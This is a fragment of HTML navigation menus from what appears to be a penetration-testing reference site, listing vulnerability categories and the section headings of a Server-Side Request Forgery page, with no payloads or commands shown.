Hidden Parameters
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_24">
<span class="md-nav__icon md-icon"></span>
Hidden Parameters
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Hidden%20Parameters/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Hidden Parameters
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_25" >
<label class="md-nav__link" for="__nav_25" id="__nav_25_label" tabindex="0">
<span class="md-ellipsis">
Insecure Deserialization
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_25_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_25">
<span class="md-nav__icon md-icon"></span>
Insecure Deserialization
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/DotNET/" class="md-nav__link">
<span class="md-ellipsis">
.NET Serialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Java/" class="md-nav__link">
<span class="md-ellipsis">
Java Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Node/" class="md-nav__link">
<span class="md-ellipsis">
Node Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/PHP/" class="md-nav__link">
<span class="md-ellipsis">
PHP Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Python/" class="md-nav__link">
<span class="md-ellipsis">
Python Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Ruby Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/YAML/" class="md-nav__link">
<span class="md-ellipsis">
YAML Deserialization
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_26" >
<label class="md-nav__link" for="__nav_26" id="__nav_26_label" tabindex="0">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_26_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_26">
<span class="md-nav__icon md-icon"></span>
Insecure Direct Object References
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Direct%20Object%20References/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_27" >
<label class="md-nav__link" for="__nav_27" id="__nav_27_label" tabindex="0">
<span class="md-ellipsis">
Insecure Management Interface
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_27_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_27">
<span class="md-nav__icon md-icon"></span>
Insecure Management Interface
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Management%20Interface/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Management Interface
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_28" >
<label class="md-nav__link" for="__nav_28" id="__nav_28_label" tabindex="0">
<span class="md-ellipsis">
Insecure Randomness
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_28_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_28">
<span class="md-nav__icon md-icon"></span>
Insecure Randomness
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Randomness/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Randomness
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_29" >
<label class="md-nav__link" for="__nav_29" id="__nav_29_label" tabindex="0">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_29_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_29">
<span class="md-nav__icon md-icon"></span>
Insecure Source Code Management
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_30" >
<label class="md-nav__link" for="__nav_30" id="__nav_30_label" tabindex="0">
<span class="md-ellipsis">
JSON Web Token
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_30_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_30">
<span class="md-nav__icon md-icon"></span>
JSON Web Token
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../JSON%20Web%20Token/" class="md-nav__link">
<span class="md-ellipsis">
JWT - JSON Web Token
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_31" >
<label class="md-nav__link" for="__nav_31" id="__nav_31_label" tabindex="0">
<span class="md-ellipsis">
Java RMI
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_31_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_31">
<span class="md-nav__icon md-icon"></span>
Java RMI
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Java%20RMI/" class="md-nav__link">
<span class="md-ellipsis">
Java RMI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_32" >
<label class="md-nav__link" for="__nav_32" id="__nav_32_label" tabindex="0">
<span class="md-ellipsis">
Kubernetes
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_32_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_32">
<span class="md-nav__icon md-icon"></span>
Kubernetes
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Kubernetes/" class="md-nav__link">
<span class="md-ellipsis">
Kubernetes
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_33" >
<label class="md-nav__link" for="__nav_33" id="__nav_33_label" tabindex="0">
<span class="md-ellipsis">
LDAP Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_33_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_33">
<span class="md-nav__icon md-icon"></span>
LDAP Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LDAP%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LDAP Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_34" >
<label class="md-nav__link" for="__nav_34" id="__nav_34_label" tabindex="0">
<span class="md-ellipsis">
LaTeX Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_34_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_34">
<span class="md-nav__icon md-icon"></span>
LaTeX Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LaTeX%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LaTex Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_35" >
<label class="md-nav__link" for="__nav_35" id="__nav_35_label" tabindex="0">
<span class="md-ellipsis">
Mass Assignment
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_35_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_35">
<span class="md-nav__icon md-icon"></span>
Mass Assignment
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Mass%20Assignment/" class="md-nav__link">
<span class="md-ellipsis">
Mass Assignment
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_36" >
<label class="md-nav__link" for="__nav_36" id="__nav_36_label" tabindex="0">
<span class="md-ellipsis">
Methodology and Resources
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_36_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_36">
<span class="md-nav__icon md-icon"></span>
Methodology and Resources
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Active%20Directory%20Attack/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - AWS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - Azure
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Docker%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Kubernetes%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Kubernetes
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Escape%20Breakout/" class="md-nav__link">
<span class="md-ellipsis">
Application Escape and Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/HTML%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Hash%20Cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Initial%20Access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/MSSQL%20Server%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Server
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Methodology%20and%20enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology and Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Miscellaneous%20-%20Tricks/" class="md-nav__link">
<span class="md-ellipsis">
Miscellaneous & Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Pivoting%20Techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Office%20-%20Attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Powershell%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management & CI/CD Compromise
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Subdomains%20Enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Subdomains Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Vulnerability%20Reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20DPAPI/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Mimikatz/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Using%20credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_37" >
<label class="md-nav__link" for="__nav_37" id="__nav_37_label" tabindex="0">
<span class="md-ellipsis">
NoSQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_37_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_37">
<span class="md-nav__icon md-icon"></span>
NoSQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../NoSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
NoSQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_38" >
<label class="md-nav__link" for="__nav_38" id="__nav_38_label" tabindex="0">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_38_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_38">
<span class="md-nav__icon md-icon"></span>
OAuth Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../OAuth%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_39" >
<label class="md-nav__link" for="__nav_39" id="__nav_39_label" tabindex="0">
<span class="md-ellipsis">
Open Redirect
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_39_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_39">
<span class="md-nav__icon md-icon"></span>
Open Redirect
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Open%20Redirect/" class="md-nav__link">
<span class="md-ellipsis">
Open URL Redirection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_40" >
<label class="md-nav__link" for="__nav_40" id="__nav_40_label" tabindex="0">
<span class="md-ellipsis">
Prompt Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_40_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_40">
<span class="md-nav__icon md-icon"></span>
Prompt Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prompt%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Prompt Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_41" >
<label class="md-nav__link" for="__nav_41" id="__nav_41_label" tabindex="0">
<span class="md-ellipsis">
Prototype Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_41_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_41">
<span class="md-nav__icon md-icon"></span>
Prototype Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prototype%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
Prototype Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_42" >
<label class="md-nav__link" for="__nav_42" id="__nav_42_label" tabindex="0">
<span class="md-ellipsis">
Race Condition
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_42_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_42">
<span class="md-nav__icon md-icon"></span>
Race Condition
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Race%20Condition/" class="md-nav__link">
<span class="md-ellipsis">
Race Condition
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_43" >
<label class="md-nav__link" for="__nav_43" id="__nav_43_label" tabindex="0">
<span class="md-ellipsis">
Request Smuggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_43_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_43">
<span class="md-nav__icon md-icon"></span>
Request Smuggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Request%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
Request Smuggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_44" >
<label class="md-nav__link" for="__nav_44" id="__nav_44_label" tabindex="0">
<span class="md-ellipsis">
SAML Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_44">
<span class="md-nav__icon md-icon"></span>
SAML Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../SAML%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SAML Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_45" >
<label class="md-nav__link" for="__nav_45" id="__nav_45_label" tabindex="0">
<span class="md-ellipsis">
SQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_45_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_45">
<span class="md-nav__icon md-icon"></span>
SQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../SQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/BigQuery%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Google BigQuery SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/Cassandra%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cassandra Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/DB2%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
DB2 Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/HQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Hibernate Query Language Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/MSSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/MySQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MySQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/OracleSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Oracle SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/PostgreSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
PostgreSQL injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/SQLite%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQLite Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_46" >
<label class="md-nav__link" for="__nav_46" id="__nav_46_label" tabindex="0">
<span class="md-ellipsis">
Server Side Include Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_46_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_46">
<span class="md-nav__icon md-icon"></span>
Server Side Include Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Include%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Include Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_47" checked>
<label class="md-nav__link" for="__nav_47" id="__nav_47_label" tabindex="0">
<span class="md-ellipsis">
Server Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_47_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_47">
<span class="md-nav__icon md-icon"></span>
Server Side Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#payloads-with-localhost" class="md-nav__link">
<span class="md-ellipsis">
Payloads with localhost
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-filters" class="md-nav__link">
<span class="md-ellipsis">
Bypassing filters
</span>
</a>
<nav class="md-nav" aria-label="Bypassing filters">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#bypass-using-https" class="md-nav__link">
<span class="md-ellipsis">
Bypass using HTTPS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with" class="md-nav__link">
<span class="md-ellipsis">
Bypass localhost with [::]
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-a-domain-redirection" class="md-nav__link">
<span class="md-ellipsis">
Bypass localhost with a domain redirection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-cidr" class="md-nav__link">
<span class="md-ellipsis">
Bypass localhost with CIDR
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-a-decimal-ip-location" class="md-nav__link">
<span class="md-ellipsis">
Bypass using a decimal IP location
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-octal-ip" class="md-nav__link">
<span class="md-ellipsis">
Bypass using octal IP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-ipv6ipv4-address-embedding" class="md-nav__link">
<span class="md-ellipsis">
Bypass using IPv6/IPv4 Address Embedding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-malformed-urls" class="md-nav__link">
<span class="md-ellipsis">
Bypass using malformed urls
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-rare-address" class="md-nav__link">
<span class="md-ellipsis">
Bypass using rare address
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-url-encoding" class="md-nav__link">
<span class="md-ellipsis">
Bypass using URL encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-bash-variables" class="md-nav__link">
<span class="md-ellipsis">
Bypass using bash variables
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-tricks-combination" class="md-nav__link">
<span class="md-ellipsis">
Bypass using tricks combination
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-enclosed-alphanumerics" class="md-nav__link">
<span class="md-ellipsis">
Bypass using enclosed alphanumerics
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-unicode" class="md-nav__link">
<span class="md-ellipsis">
Bypass using unicode
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-filter_var-php-function" class="md-nav__link">
<span class="md-ellipsis">
Bypass filter_var() php function
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-against-a-weak-parser" class="md-nav__link">
<span class="md-ellipsis">
Bypass against a weak parser
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-a-redirect" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using a redirect
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-typeurl" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using type=url
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-dns-rebinding-toctou" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using DNS Rebinding (TOCTOU)
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-jar-protocol-java-only" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using jar protocol (java only)
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploitation-via-url-scheme" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploitation via URL Scheme
</span>
</a>
<nav class="md-nav" aria-label="SSRF exploitation via URL Scheme">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#file" class="md-nav__link">
<span class="md-ellipsis">
File
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#http" class="md-nav__link">
<span class="md-ellipsis">
HTTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#dict" class="md-nav__link">
<span class="md-ellipsis">
Dict
</span>
